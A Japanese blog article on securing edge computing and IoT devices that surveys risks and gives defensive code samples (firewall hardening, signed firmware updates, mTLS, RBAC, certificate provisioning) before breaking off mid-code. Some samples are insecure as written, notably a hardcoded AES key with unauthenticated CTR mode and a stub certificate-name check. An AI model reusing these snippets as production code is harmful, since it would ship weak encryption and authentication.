エッジコンピューティングのセキュリティベストプラクティス:IoTデバイスを安全に運用する方法
12 May, 2025エッジコンピューティングとは?IoTデバイスにおける役割と重要性
エッジコンピューティングは、データ処理をクラウドからデバイスの近くに移動させる革新的なアプローチです。「エッジ」とは、データが生成される場所(IoTデバイスなど)の近くで処理が行われることを意味します。これにより、レイテンシの削減、帯域幅の節約、リアルタイム処理の実現などの利点があります。
エッジコンピューティングがIoTデバイスにもたらす主な利点は次のとおりです:
- レイテンシの削減:データをクラウドに送信する代わりに、エッジで処理することで応答時間が大幅に短縮されます。
- 帯域幅の効率化:生データをすべてクラウドに送信する必要がなく、処理済みの要約データだけを送ればよいため、ネットワーク負荷を軽減できます。
- オフライン処理能力:インターネット接続が不安定な環境でも、デバイスは処理を継続できます。
- プライバシー強化:センシティブなデータをローカルで処理できるため、データ漏洩リスクを減らせます。
例えば、スマートホームセキュリティカメラを考えてみましょう。エッジコンピューティングを活用すると、次のように動作します:
# エッジデバイスでの動体検知の例
import cv2
import numpy as np
from camera import Camera # 仮想的なカメラモジュール
# カメラ初期化
cam = Camera()
# モーション検知設定
motion_detector = cv2.createBackgroundSubtractorMOG2()
MOTION_THRESHOLD = 500 # 動きと判断するピクセル閾値
def process_locally():
"""エッジデバイス上でリアルタイム処理を行う関数"""
while True:
frame = cam.get_frame()
# エッジでの動体検知(クラウドに送信せず)
fg_mask = motion_detector.apply(frame)
motion_pixels = np.count_nonzero(fg_mask)
if motion_pixels > MOTION_THRESHOLD:
# 動体検知時のみアラート送信(データ削減)
alert = {
"event": "motion_detected",
"timestamp": get_timestamp(),
"thumbnail": compress_image(frame) # 画像を圧縮して送信
}
send_to_cloud(alert) # 圧縮した結果だけクラウドに送信
# ローカルでの即時アクション(低レイテンシ)
trigger_local_alarm()このシンプルな例からわかるように、エッジコンピューティングではすべての生映像データをクラウドに送信する代わりに、動体が検知された場合にのみ、圧縮された画像と共にアラートを送信します。これにより、帯域幅使用量を劇的に削減しながら、侵入などへの迅速な対応が可能になります。
「コンピュータリソースをユーザーに近づけるほど、応答性は向上する」というエッジコンピューティングの格言はまさにその本質を表しています。しかし、エッジへの処理移行は、セキュリティの観点から新たな課題ももたらします。次のセクションでは、これらのセキュリティリスクについて詳しく見ていきましょう。
エッジコンピューティングにおける主なセキュリティリスク
エッジコンピューティングには多くの利点がある一方で、分散化された処理環境特有のセキュリティリスクも存在します。エッジデバイスは多くの場合、物理的にアクセス可能な場所に設置され、リソース制約があるため、従来のクラウドセキュリティアプローチをそのまま適用できない場合があります。
1. 物理的な脆弱性
エッジデバイスは現場に設置されることが多く、物理的なアクセスに対して脆弱です。攻撃者が直接デバイスにアクセスできると、以下のリスクが生じます:
- ハードウェアの改ざん: デバイスの物理的な改ざんによる監視や制御の奪取
- メモリダンプ攻撃: デバイスから直接機密データを抽出
- ファームウェアの抽出と解析: リバースエンジニアリングによる脆弱性の発見
例えば、セキュリティカメラのメモリチップを直接読み取ることで、暗号化キーが漏洩するリスクがあります。
2. リソース制約によるセキュリティ課題
多くのIoTデバイスはCPUパワー、メモリ、ストレージが限られています:
# 一般的なエッジデバイスのリソース仕様(例)
型番: ESP32
CPU: 240 MHz デュアルコア
メモリ: 520 KB SRAM
ストレージ: 4MB Flash
消費電力: 低消費電力モードで数μAこのリソース制約により以下の問題が生じます:
- 軽量な暗号化の必要性: 完全な暗号化ソリューションを実行するだけの処理能力が不足
- 定期的な更新の難しさ: 限られたストレージとネットワーク帯域幅により、セキュリティパッチの適用が難しい
- セキュリティ監視の制限: 負荷の高いリアルタイム監視ソフトウェアを実行できない
3. 不十分な認証メカニズム
多くのエッジデバイスは、簡易的な認証方法を採用しており、以下のような問題が発生しています:
- 弱いデフォルトパスワード: 製造時のデフォルト認証情報がそのまま使用される
- 資格情報の平文保存: 認証情報が暗号化されずにデバイスに保存される
- 非対称認証のない更新メカニズム: 更新プロセスに適切な署名検証がない
これにより、2016年のMirai botnetのような大規模攻撃が発生しました。このマルウェアは弱いデフォルトパスワードを持つIoTデバイスを標的にし、大規模なDDoS攻撃に利用されました。
4. ネットワークセキュリティの課題
エッジデバイスは多様なネットワークに接続される性質上、特有のネットワークセキュリティ課題があります:
- セグメンテーション不足: エッジデバイスとエンタープライズネットワークの境界が明確でない
- 暗号化されていない通信: リソース制約により、通信が平文で行われることがある
- サイドチャネル攻撃: ネットワークトラフィックパターンからの情報漏洩
例えば、スマートファクトリーの異なるセンサー間の通信が暗号化されていない場合、攻撃者は中間者攻撃により制御コマンドを改ざんし、生産ラインに損害を与える可能性があります。
5. ソフトウェアとファームウェアの脆弱性
エッジデバイスのソフトウェアには特有の脆弱性があります:
- サポート終了のOS/ライブラリ: 古いライブラリやOSを使用しているデバイスが更新されない
- サードパーティコンポーネントのリスク: 様々なソフトウェアコンポーネントが統合され、サプライチェーンリスクが高まる
- ファームウェア更新の難しさ: OTA(Over-The-Air)更新機能がないか、安全でない実装
「セキュリティはチェーンの最も弱い環の強さである」という格言があるように、エッジシステム全体のセキュリティは最も脆弱なデバイスによって決まります。次のセクションでは、これらのリスクに対する具体的な対策を見ていきましょう。
IoTデバイスを保護するための基本的なセキュリティ対策
エッジデバイスを守るためには、包括的なセキュリティアプローチが必要です。ここでは、IoTデバイスを保護するための基本的かつ効果的な対策を紹介します。
1. デバイスの安全な初期設定と構成管理
IoTデバイスのセキュリティは、適切な初期設定から始まります:
# 安全なIoTデバイス設定スクリプトの例
#!/bin/bash
# デフォルトパスワードの変更
echo "新しい管理者パスワードを設定してください:"
read -s NEW_ADMIN_PASSWORD
change_password admin "$NEW_ADMIN_PASSWORD"
# 不要なサービスの無効化
echo "不要なサービスを無効化しています..."
systemctl disable telnet
systemctl disable ftp
systemctl stop telnet
systemctl stop ftp
# ファイアウォール設定
echo "ファイアウォールを設定しています..."
iptables -A INPUT -p tcp --dport 22 -s 192.168.1.0/24 -j ACCEPT # 内部ネットワークからのSSHのみ許可
iptables -A INPUT -p tcp --dport 80 -j DROP # HTTPを無効化
iptables -A INPUT -p tcp --dport 443 -j ACCEPT # HTTPSのみ許可
iptables-save > /etc/iptables/rules.v4 # 設定を保存
# ログの有効化
echo "ログ設定をしています..."
mkdir -p /var/log/device
chmod 700 /var/log/device
setup_logging --level detailed --path /var/log/device
echo "初期セキュリティ設定が完了しました"安全な初期設定の重要なポイント:
- デフォルト認証情報の変更: 初回起動時に強力なパスワードに変更する
- 最小特権の原則: 必要なサービスと機能のみを有効にする
- セキュアブート: 信頼された署名付きファームウェアのみブート可能にする
- デバイスインベントリ管理: 導入されているすべてのデバイスの詳細な記録を管理
2. ハードウェアセキュリティの強化
物理的なアクセスからデバイスを保護するためのアプローチには以下があります:
- 改ざん検知機能: デバイスケースが開けられた場合にアラートを発するセンサーの設置
- セキュアエレメント: 暗号鍵を安全に保管するためのハードウェア要素の使用
- セキュアブートチェーン: 起動時に各ステップの整合性を検証
- メモリ保護機構: 重要なメモリ領域の保護と分離
TPM(Trusted Platform Module)や、HSM(Hardware Security Module)などのセキュリティハードウェアは、リソースが許す場合は導入を検討すべきです。
3. ファームウェアとソフトウェアの安全管理
エッジデバイスのソフトウェアを安全に保つためのベストプラクティス:
# ファームウェア更新検証の例
import hashlib
import requests
import os
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.serialization import load_pem_public_key
def verify_and_update_firmware(update_url, public_key_path):
"""ファームウェアの署名を検証して安全に更新する関数"""
# 新しいファームウェアとその署名をダウンロード
firmware_data = requests.get(f"{update_url}/firmware.bin").content
signature = requests.get(f"{update_url}/firmware.sig").content
# 公開鍵を読み込む
with open(public_key_path, "rb") as key_file:
public_key = load_pem_public_key(key_file.read())
try:
# 署名を検証
public_key.verify(
signature,
firmware_data,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
print("署名検証成功:正規のファームウェアです")
# ハッシュを計算して期待値と比較(追加検証)
expected_hash = requests.get(f"{update_url}/firmware.sha256").text.strip()
actual_hash = hashlib.sha256(firmware_data).hexdigest()
if actual_hash != expected_hash:
raise ValueError("ハッシュが一致しません。ファームウェアが改ざんされている可能性があります。")
# 検証が成功したら更新を実行
with open("/tmp/new_firmware.bin", "wb") as fw_file:
fw_file.write(firmware_data)
print("更新を開始します...")
os.system("flash_firmware /tmp/new_firmware.bin")
return True
except Exception as e:
print(f"検証エラー: {e}")
return Falseソフトウェア管理のポイント:
- 署名付き更新のみを許可: デジタル署名を検証してからのみ更新を適用
- 安全な更新メカニズム: 更新プロセス中の障害からの回復メカニズムを実装
- セキュリティパッチの適時適用: ベンダーからのセキュリティ更新を迅速に適用
- 依存関係の管理: サードパーティライブラリの脆弱性を監視し更新
4. ネットワークセグメンテーションとトラフィック制御
エッジデバイスを含むネットワークは適切に分離し、トラフィックを制御する必要があります:
- VLAN分離: エッジデバイスを専用のVLANに配置して、他のネットワークと隔離
- ファイアウォールルール: 必要最小限の通信のみを許可するルールを設定
- インバウンド接続の制限: デバイスへの不要な外部アクセスを禁止
- マイクロセグメンテーション: デバイスごとに細かいアクセス制御を実装
エンタープライズネットワークの保護には、エッジデバイス専用の接続点(DMZ)を設けることも効果的です。
5. 継続的なモニタリングと異常検知
エッジデバイスの状態を常に監視することで、セキュリティ侵害の兆候を早期に発見できます:
// エッジデバイスの異常検知システムの例(Node.js)
const mqtt = require('mqtt');
const client = mqtt.connect('mqtt://monitoring-server.local');
const deviceId = 'edge-device-001';
// デバイスの基準値(学習済み)
const normalPatterns = {
cpuUsage: { mean: 15, stdDev: 5 }, // 平常時のCPU使用率
memoryUsage: { mean: 30, stdDev: 8 }, // 平常時のメモリ使用率
networkConnections: { mean: 3, stdDev: 1 } // 平常時のネットワーク接続数
};
// 現在のシステム状態を収集
function collectMetrics() {
return {
cpuUsage: getCpuUsage(), // システムから取得する想定
memoryUsage: getMemoryUsage(),
networkConnections: getNetworkConnectionCount(),
timestamp: new Date().toISOString()
};
}
// 異常を検知する(Z-スコアによる単純な検知方法)
function detectAnomalies(metrics) {
const anomalies = [];
// CPU使用率の異常チェック
const cpuZScore = Math.abs(metrics.cpuUsage - normalPatterns.cpuUsage.mean) / normalPatterns.cpuUsage.stdDev;
if (cpuZScore > 3) { // 3シグマを超える場合は異常と判断
anomalies.push(`異常なCPU使用率検知: ${metrics.cpuUsage}%`);
}
// メモリ使用率の異常チェック
const memZScore = Math.abs(metrics.memoryUsage - normalPatterns.memoryUsage.mean) / normalPatterns.memoryUsage.stdDev;
if (memZScore > 3) {
anomalies.push(`異常なメモリ使用率検知: ${metrics.memoryUsage}%`);
}
// ネットワーク接続数の異常チェック
const netZScore = Math.abs(metrics.networkConnections - normalPatterns.networkConnections.mean) / normalPatterns.networkConnections.stdDev;
if (netZScore > 3) {
anomalies.push(`異常なネットワーク接続数検知: ${metrics.networkConnections}`);
}
return anomalies;
}
// 定期的な監視を実行
setInterval(() => {
const metrics = collectMetrics();
const anomalies = detectAnomalies(metrics);
// メトリクスを監視サーバーに送信
client.publish(`metrics/${deviceId}`, JSON.stringify(metrics));
// 異常があれば通知
if (anomalies.length > 0) {
client.publish(`alerts/${deviceId}`, JSON.stringify({
deviceId,
timestamp: metrics.timestamp,
anomalies
}));
console.log(`⚠️ セキュリティアラート: ${anomalies.join(', ')}`);
}
}, 60000); // 1分ごとに実行このような継続的なモニタリングにより、通常とは異なる動作(異常なネットワークトラフィック、予期しないCPU使用率の上昇など)を検出し、セキュリティインシデントを早期に発見できます。
「予防はいつも治療よりも優れている」という言葉があるように、エッジデバイスでは事前の防御策と継続的な監視が不可欠です。次のセクションでは、エッジネットワークにおける暗号化とセキュア通信の具体的な実装方法を見ていきましょう。
エッジネットワークにおける暗号化とセキュア通信の実装方法
エッジデバイス間、およびエッジデバイスとクラウド間の通信を保護することは、エッジコンピューティングセキュリティの中核をなします。限られたリソースを持つデバイスでも実装できる、効率的な暗号化とセキュア通信の方法を見ていきましょう。
1. 軽量暗号化プロトコル
リソース制約のあるIoTデバイスでは、軽量で効率的な暗号化プロトコルが重要です:
// 軽量暗号化の実装例(ESP32向け)
#include <mbedtls/aes.h> // 軽量な暗号化ライブラリ
// 暗号化キー
const uint8_t key[16] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF};
// センサーデータを暗号化する関数
void encrypt_sensor_data(uint8_t* plaintext, size_t plaintext_len, uint8_t* ciphertext, uint8_t* iv) {
// IV(初期化ベクトル)を生成
generate_random_iv(iv, 16);
// AES-CTRモードで暗号化(低リソースデバイスに最適)
mbedtls_aes_context aes;
mbedtls_aes_init(&aes);
mbedtls_aes_setkey_enc(&aes, key, 128);
size_t nc_offset = 0;
uint8_t stream_block[16];
mbedtls_aes_crypt_ctr(&aes, plaintext_len, &nc_offset, iv, stream_block, plaintext, ciphertext);
mbedtls_aes_free(&aes);
}軽量暗号化に適したアルゴリズム:
- AES-CCM または AES-GCM: 認証付き暗号化を提供する軽量プロトコル
- ChaCha20-Poly1305: 低リソースデバイスに適した高速な暗号化プロトコル
- DTLS (Datagram TLS): UDPベースのIoT通信に適したセキュアプロトコル
これらのアルゴリズムは、リソースが限られているデバイスでも効率的に動作し、十分なセキュリティを提供します。
2. セキュアブートとコード署名
デバイスが起動する際、実行されるコードが正規のものであることを保証するために:
# セキュアブートプロセスのイメージ署名(開発環境で実行)
#!/bin/bash
# 秘密鍵を使ってファームウェアに署名
echo "ファームウェアに署名しています..."
openssl dgst -sha256 -sign private_key.pem -out firmware.sig firmware.bin
# 署名とともにファームウェアイメージをパッケージ化
echo "ファームウェアパッケージを作成しています..."
cat firmware.bin firmware.sig > firmware_package.bin
echo "署名付きファームウェアが作成されました。これをデバイスに安全に送信してください。"デバイス側では、組み込まれた公開鍵を使って署名を検証し、検証に失敗した場合はファームウェアを拒否します。
3. 相互TLS認証の実装
デバイスとサーバー双方が互いに認証するmTLS(相互TLS)は、中間者攻撃を防ぐのに効果的です:
# Python(サーバー側)でmTLSを実装する例
import ssl
import socket
def create_mtls_server():
"""相互TLS認証を使用するサーバーを作成"""
# SSL/TLSコンテキストを作成
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
# サーバー証明書と秘密鍵をロード
context.load_cert_chain(certfile='server_cert.pem', keyfile='server_key.pem')
# クライアント証明書の検証を強制
context.verify_mode = ssl.CERT_REQUIRED
# 信頼できるCA証明書をロード(これでクライアント証明書を検証)
context.load_verify_locations(cafile='ca_cert.pem')
# TLS 1.2以上を使用
context.minimum_version = ssl.TLSVersion.TLSv1_2
# ソケットを作成
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(('0.0.0.0', 8443))
server_socket.listen(5)
# TLSでラップしたソケットを使用
print("mTLSサーバーを起動しました。クライアント証明書の検証が必要です。")
while True:
client, addr = server_socket.accept()
secure_client = context.wrap_socket(client, server_side=True)
# クライアント証明書の情報を取得
cert = secure_client.getpeercert()
subject = dict(x[0] for x in cert['subject'])
print(f"セキュア接続確立: {subject['commonName']} ({addr[0]})")
# ここから安全な通信が可能...
handle_secure_connection(secure_client)IoTデバイス側でも同様に、サーバー証明書を検証し、自身の証明書を提示するコードを実装します。
4. セキュアな通信プロトコル
IoTデバイスによく使われるMQTTやCoAPなどのプロトコルをセキュアに実装する例:
// Node.js MQTTクライアントセキュア実装例
const mqtt = require('mqtt');
const fs = require('fs');
// TLS接続オプション
const options = {
port: 8883, // TLS用MQTTポート
host: 'mqtt.example.com',
protocol: 'mqtts', // TLSを使用
// TLS証明書設定
key: fs.readFileSync('client-key.pem'),
cert: fs.readFileSync('client-cert.pem'),
ca: fs.readFileSync('ca-cert.pem'),
// セキュリティ強化オプション
rejectUnauthorized: true, // サーバー証明書の検証を強制
requestCert: true, // サーバーに証明書を要求
// MQTT認証情報
username: process.env.MQTT_USER, // 環境変数から読み込み
password: process.env.MQTT_PASSWORD
};
// セキュアMQTT接続
const client = mqtt.connect(options);
client.on('connect', () => {
console.log('セキュア接続確立');
// セキュアな通信
client.subscribe('devices/+/data');
});
client.on('message', (topic, message) => {
// メッセージ処理...
console.log(`${topic}: ${message.toString()}`);
});
// エラーハンドリング
client.on('error', (err) => {
console.error('接続エラー:', err);
});セキュア通信プロトコルのポイント:
- MQTT over TLS (MQTTS): ポート8883を使用したTLS暗号化通信
- CoAPS: DTLSを使用したセキュアなCoAP通信
- HTTPS: RESTful APIを使用するデバイス向けのセキュア通信
5. 透過的プロキシとセキュリティゲートウェイ
リソースが極めて限られたデバイスでは、専用のセキュリティゲートウェイを使用することも効果的な戦略です:
# Docker ComposeでのIoTセキュリティゲートウェイ設定例
version: '3'
services:
mqtt-broker:
image: eclipse-mosquitto:latest
ports:
- "1883:1883" # 内部ネットワークからの非暗号化接続用
networks:
- internal-net
volumes:
- ./mosquitto/config:/mosquitto/config
security-gateway:
image: security-gateway:latest # カスタムイメージ
depends_on:
- mqtt-broker
ports:
- "8883:8883" # 外部からのTLS接続用
networks:
- internal-net
- external-net
volumes:
- ./certs:/certs
environment:
- INTERNAL_BROKER=mqtt-broker:1883
- TLS_CERT_PATH=/certs/server.crt
- TLS_KEY_PATH=/certs/server.key
- CA_CERT_PATH=/certs/ca.crt
networks:
internal-net:
internal: true # 外部から直接アクセス不可
external-net:
# 外部ネットワークに接続この設計では、リソース制約のあるIoTデバイスが内部ネットワークで非暗号化接続を使用し、セキュリティゲートウェイが外部との通信を暗号化と認証で保護します。
実装時の注意点
エッジデバイスのセキュア通信を実装する際の重要なポイント:
- 鍵管理の自動化: デバイスの証明書と鍵のローテーション、更新を自動化する
- Perfect Forward Secrecy (PFS): セッション鍵が漏洩しても過去の通信を解読できないよう設計
- 圧縮の無効化: CRIME/BREACHなどの攻撃を防ぐため、TLS通信での圧縮を無効化
- 旧式プロトコルの無効化: SSLv3、TLS 1.0/1.1など安全でないプロトコルを無効化
- 安全でない暗号の無効化: RC4、DES、3DESなど脆弱な暗号スイートを無効化
「最も壮大な暗号でも、最も単純な実装ミスで台無しになる」という格言があるように、セキュリティ実装の詳細には細心の注意を払うことが重要です。
次のセクションでは、エッジデバイスの認証・認可についてより詳しく説明します。
![SRE サイトリライアビリティエンジニアリング Googleの信頼性を支えるエンジニアリングチーム [ Betsy Beyer ]](https://thumbnail.image.rakuten.co.jp/@0_mall/book/cabinet/7911/9784873117911.jpg)
安全なエッジコンピューティングを実現するための認証・認可ベストプラクティス
IoTデバイスとエッジシステムのアクセス制御は、信頼性の高いセキュリティ保護のために不可欠です。ここでは、リソース制約を考慮した効果的な認証・認可の方法を紹介します。
1. デバイス認証のベストプラクティス
エッジデバイスを識別し、認証するためのベストプラクティスを見ていきましょう:
// デバイス認証のための共通インターフェース(Javaの例)
public interface DeviceAuthenticator {
/**
* デバイスを認証するメソッド
* @param deviceId デバイス識別子
* @param credentials 認証情報
* @return 認証結果
*/
AuthResult authenticate(String deviceId, Credentials credentials);
}
// X.509証明書ベースの認証実装
public class CertificateAuthenticator implements DeviceAuthenticator {
private final TrustManager[] trustManagers; // 信頼するCA証明書
public CertificateAuthenticator(KeyStore trustStore) throws Exception {
// 信頼するCAストアから検証用TrustManagerを初期化
TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
tmf.init(trustStore);
this.trustManagers = tmf.getTrustManagers();
}
@Override
public AuthResult authenticate(String deviceId, Credentials credentials) {
if (!(credentials instanceof CertificateCredentials)) {
return AuthResult.failure("証明書が必要です");
}
CertificateCredentials certCreds = (CertificateCredentials) credentials;
X509Certificate cert = certCreds.getCertificate();
try {
// 証明書の検証
cert.checkValidity(); // 有効期限チェック
// 証明書チェーンの検証
X509TrustManager trustManager = (X509TrustManager) trustManagers[0];
trustManager.checkClientTrusted(new X509Certificate[]{cert}, "RSA");
// 証明書に含まれるCNがデバイスIDと一致するか確認
String certCN = extractCNFromCertificate(cert);
if (!deviceId.equals(certCN)) {
return AuthResult.failure("デバイスIDと証明書CNが一致しません");
}
return AuthResult.success(deviceId);
} catch (Exception e) {
return AuthResult.failure("証明書検証エラー: " + e.getMessage());
}
}
private String extractCNFromCertificate(X509Certificate cert) {
// 証明書からCNを抽出するロジック
// ...
return "device-id"; // 実際の実装では証明書からCNを抽出
}
}デバイス認証の主なアプローチ:
- X.509証明書ベース認証: デバイスごとに固有の証明書を発行し、それを使用して認証
- トークンベース認証: JWTなどの署名付きトークンを使用した軽量認証
- デバイスハードウェア固有特性(PUF): 物理的な特性を利用した認証メカニズム
- トラストアンカー: デバイスに組み込まれたハードウェアセキュリティモジュールを活用
2. OAuth 2.0とOpenID Connectを活用した認証
より大きなエッジシステムでは、標準的なOAuth 2.0フレームワークを採用することで、安全かつスケーラブルな認証が可能になります:
// TypeScriptでのOAuth 2.0クライアント認証の例
import { OAuth2Client } from 'oauth2-client';
class EdgeDeviceAuthService {
private oauth2Client: OAuth2Client;
private tokenCache: { accessToken: string; expiresAt: number } | null = null;
constructor(
private readonly clientId: string,
private readonly clientSecret: string,
private readonly tokenEndpoint: string,
private readonly scope: string
) {
this.oauth2Client = new OAuth2Client({
clientId,
clientSecret,
tokenEndpoint
});
}
/**
* クライアント認証情報グラント(Client Credentials Grant)を使用して
* アクセストークンを取得
*/
async getAccessToken(): Promise<string> {
// キャッシュされたトークンがあり、有効期限内であれば再利用
if (this.tokenCache && this.tokenCache.expiresAt > Date.now()) {
return this.tokenCache.accessToken;
}
try {
// 新しいトークンを取得
const tokenResponse = await this.oauth2Client.getToken({
grant_type: 'client_credentials',
scope: this.scope
});
// トークンをキャッシュ(有効期限の10秒前までを有効とする)
this.tokenCache = {
accessToken: tokenResponse.access_token,
expiresAt: Date.now() + (tokenResponse.expires_in * 1000) - 10000
};
return this.tokenCache.accessToken;
} catch (error) {
console.error('認証トークン取得エラー:', error);
throw new Error('認証に失敗しました');
}
}
/**
* APIリクエストにアクセストークンを付加
*/
async authorizedRequest(url: string, options: RequestInit = {}): Promise<Response> {
const token = await this.getAccessToken();
// Authorization ヘッダーにトークンを設定
const headers = new Headers(options.headers || {});
headers.set('Authorization', `Bearer ${token}`);
return fetch(url, {
...options,
headers
});
}
}OAuth 2.0ベースの認証を導入する利点:
- 標準化: 広く採用された標準プロトコルにより相互運用性が向上
- 細かな権限制御: スコープによる詳細な権限管理が可能
- トークンの有効期限: 短い有効期限のトークンによりリスクを低減
- 中央集権的な管理: 一元的なアクセス制御と監査が可能
3. きめ細かな認可制御
リソースへのアクセスを制御するための認可メカニズムについて見ていきましょう:
# PythonでのRBAC(Role-Based Access Control)実装例
class Permission:
READ = "read"
WRITE = "write"
EXECUTE = "execute"
ADMIN = "admin"
class Resource:
def __init__(self, resource_id, resource_type):
self.resource_id = resource_id
self.resource_type = resource_type
class Role:
def __init__(self, name, permissions=None):
self.name = name
self.permissions = permissions or {} # {resource_type: [permissions]}
def add_permission(self, resource_type, permission):
if resource_type not in self.permissions:
self.permissions[resource_type] = set()
self.permissions[resource_type].add(permission)
def has_permission(self, resource_type, permission):
return (resource_type in self.permissions and
permission in self.permissions[resource_type])
class RBACAuthorizationService:
def __init__(self):
self.roles = {} # {role_name: Role}
self.user_roles = {} # {user_id: [role_names]}
self.device_roles = {} # {device_id: [role_names]}
def assign_role_to_device(self, device_id, role_name):
if device_id not in self.device_roles:
self.device_roles[device_id] = set()
self.device_roles[device_id].add(role_name)
def check_permission(self, device_id, resource, permission):
"""デバイスがリソースに対して特定の権限を持っているか確認"""
if device_id not in self.device_roles:
return False
device_role_names = self.device_roles[device_id]
for role_name in device_role_names:
if role_name not in self.roles:
continue
role = self.roles[role_name]
if role.has_permission(resource.resource_type, permission):
return True
return False
# 使用例
rbac = RBACAuthorizationService()
# ロールの定義
sensor_role = Role("sensor")
sensor_role.add_permission("telemetry", Permission.WRITE)
sensor_role.add_permission("config", Permission.READ)
actuator_role = Role("actuator")
actuator_role.add_permission("command", Permission.EXECUTE)
admin_role = Role("admin")
admin_role.add_permission("telemetry", Permission.READ)
admin_role.add_permission("telemetry", Permission.WRITE)
admin_role.add_permission("command", Permission.EXECUTE)
admin_role.add_permission("config", Permission.READ)
admin_role.add_permission("config", Permission.WRITE)
# ロールを登録
rbac.roles["sensor"] = sensor_role
rbac.roles["actuator"] = actuator_role
rbac.roles["admin"] = admin_role
# デバイスにロールを割り当て
rbac.assign_role_to_device("temp-sensor-01", "sensor")
rbac.assign_role_to_device("smart-relay-01", "actuator")
rbac.assign_role_to_device("gateway-01", "admin")
# アクセス確認
telemetry_resource = Resource("temperature-data", "telemetry")
print(rbac.check_permission("temp-sensor-01", telemetry_resource, Permission.WRITE)) # True
print(rbac.check_permission("temp-sensor-01", telemetry_resource, Permission.READ)) # Falseエッジシステムにおける効果的な認可メカニズム:
- ロールベースアクセス制御(RBAC): デバイスにロールを割り当て、ロールに基づいてアクセス制御
- 属性ベースアクセス制御(ABAC): デバイスの属性、リソースの属性、環境の属性など複数の要素を考慮
- ポリシーベースアクセス制御: 詳細なポリシーに基づいたアクセス制御
- 最小権限の原則: 必要最小限の権限のみを付与
4. デバイスプロビジョニングとライフサイクル管理
新しいデバイスを安全にシステムに追加し、ライフサイクル全体を通じて認証情報を管理する方法:
// GoでのIoTデバイスプロビジョニングシステムの例
package main
import (
"crypto/rand"
"crypto/rsa"
"crypto/x509"
"crypto/x509/pkix"
"encoding/pem"
"fmt"
"math/big"
"time"
)
// デバイスプロビジョニングサービス
type DeviceProvisioningService struct {
caPrivateKey *rsa.PrivateKey
caCert *x509.Certificate
deviceDB map[string]*DeviceInfo
}
// デバイス情報
type DeviceInfo struct {
DeviceID string
SerialNumber string
CertificateID string
Status string // "active", "revoked", "expired"
CreatedAt time.Time
UpdatedAt time.Time
}
// 新しいデバイスをプロビジョニング
func (s *DeviceProvisioningService) ProvisionDevice(deviceID, serialNumber string) (*DeviceCredentials, error) {
// すでに存在するかチェック
if _, exists := s.deviceDB[deviceID]; exists {
return nil, fmt.Errorf("デバイスID %s はすでに存在します", deviceID)
}
// デバイスの秘密鍵を生成
privateKey, err := rsa.GenerateKey(rand.Reader, 2048)
if err != nil {
return nil, fmt.Errorf("秘密鍵生成エラー: %v", err)
}
// 証明書を生成
certTemplate := x509.Certificate{
SerialNumber: big.NewInt(time.Now().Unix()),
Subject: pkix.Name{
CommonName: deviceID,
Organization: []string{"Example IoT Organization"},
},
NotBefore: time.Now(),
NotAfter: time.Now().AddDate(1, 0, 0), // 1年間有効
KeyUsage: x509.KeyUsageDigitalSignature | x509.KeyUsageKeyEncipherment,
ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
}
// CAによる署名
certBytes, err := x509.CreateCertificate(
rand.Reader,
&certTemplate,
s.caCert,
&privateKey.PublicKey,
s.caPrivateKey,
)
if err != nil {
return nil, fmt.Errorf("証明書生成エラー: %v", err)
}
// PEM形式にエンコード
certPEM := pem.EncodeToMemory(&pem.Block{
Type: "CERTIFICATE",
Bytes: certBytes,
})
privKeyPEM := pem.EncodeToMemory(&pem.Block{
Type: "RSA PRIVATE KEY",
Bytes: x509.MarshalPKCS1PrivateKey(privateKey),
})
// デバイス情報をDBに保存
now := time.Now()
s.deviceDB[deviceID] = &DeviceInfo{
DeviceID: deviceID,
SerialNumber: serialNumber,
CertificateID: fmt.Sprintf("%x", certTemplate.SerialNumber),
Status: "active",
CreatedAt: now,
UpdatedAt: now,
}
// 認証情報を返す
return &DeviceCredentials{
DeviceID: deviceID,
Certificate: string(certPEM),
PrivateKey: string(privKeyPEM),
CACertificate: "", // CA証明書を含める
ExpirationDate: certTemplate.NotAfter,
}, nil
}
// 証明書の失効
func (s *DeviceProvisioningService) RevokeDevice(deviceID string) error {
device, exists := s.deviceDB[deviceID]
if !exists {
return fmt.Errorf("デバイスID %s は存在しません", deviceID)
}
device.Status = "revoked"
device.UpdatedAt = time.Now()
// 実際の証明書失効リスト(CRL)の更新を行う
// ...
return nil
}
// デバイス認証情報
type DeviceCredentials struct {
DeviceID string
Certificate string
PrivateKey string
CACertificate string
ExpirationDate time.Time
}効果的なデバイスプロビジョニングとライフサイクル管理のポイント:
- 初期認証情報: デバイス製造時または初回起動時の安全な初期認証情報発行
- ゼロタッチプロビジョニング: 人間の介入なしで自動的にデバイスをプロビジョニング
- 証明書ローテーション: 定期的な証明書の更新メカニズム
- 証明書失効管理: 不要になったデバイスの証明書を失効させる仕組み
- セキュアな鍵保管: 秘密鍵を安全に保管するためのメカニズム
5. アクセス制御の監査とモニタリング
誰が・いつ・何にアクセスしたかを記録し監視することは、セキュリティ体制の重要な部分です:
// Node.jsでのアクセス監査ロギングの例
const winston = require('winston');
const { combine, timestamp, json } = winston.format;
// 監査ロガーの設定
const auditLogger = winston.createLogger({
level: 'info',
format: combine(
timestamp(),
json()
),
defaultMeta: { service: 'edge-access-control' },
transports: [
new winston.transports.File({ filename: 'audit.log' }),
new winston.transports.Console({ format: winston.format.simple() })
]
});
class AccessAuditor {
/**
* アクセス監査ログを記録
* @param {string} deviceId アクセスを試みたデバイスID
* @param {string} resourceId アクセス対象のリソースID
* @param {string} action 実行しようとした操作
* @param {boolean} allowed アクセスが許可されたかどうか
* @param {object} metadata 追加情報
*/
logAccess(deviceId, resourceId, action, allowed, metadata = {}) {
auditLogger.info({
eventType: 'access_attempt',
deviceId,
resourceId,
action,
allowed,
...metadata,
timestamp: new Date().toISOString()
});
}
/**
* 認証イベントを記録
* @param {string} deviceId 認証を試みたデバイスID
* @param {boolean} success 認証の成否
* @param {string} method 認証方法(証明書、トークンなど)
* @param {object} metadata 追加情報
*/
